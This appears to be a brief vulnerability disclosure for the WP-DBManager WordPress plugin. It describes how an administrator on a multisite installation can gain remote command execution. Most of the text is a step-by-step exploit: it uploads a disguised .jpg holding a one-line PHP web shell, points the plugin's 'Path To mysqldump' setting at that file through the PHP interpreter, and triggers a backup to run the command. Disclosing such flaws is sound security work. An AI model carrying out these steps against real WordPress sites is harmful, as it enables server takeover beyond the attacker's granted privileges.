The plugin does not prevent administrators from running arbitrary commands on the server in multisite installations, where only super-administrators should.
# Use any WordPress plugin that allows the users to upload files with extension - ".php" is not required - for example: .jpg (usually many plugins allows such extensions)
# Upload your malicious file, for example: test_rce.jpg with the following content:
<?php system("COMMAND"); ?>
# Go to "DB Options" under WP-DBManager plugin
# Define the below payload as "Path To mysqldump" parameter's value:
/usr/bin/php /var/www/blog/test_rce.jpg
# Go to "Backup DB" and click on "Backup" button
# Command will get executed without any issues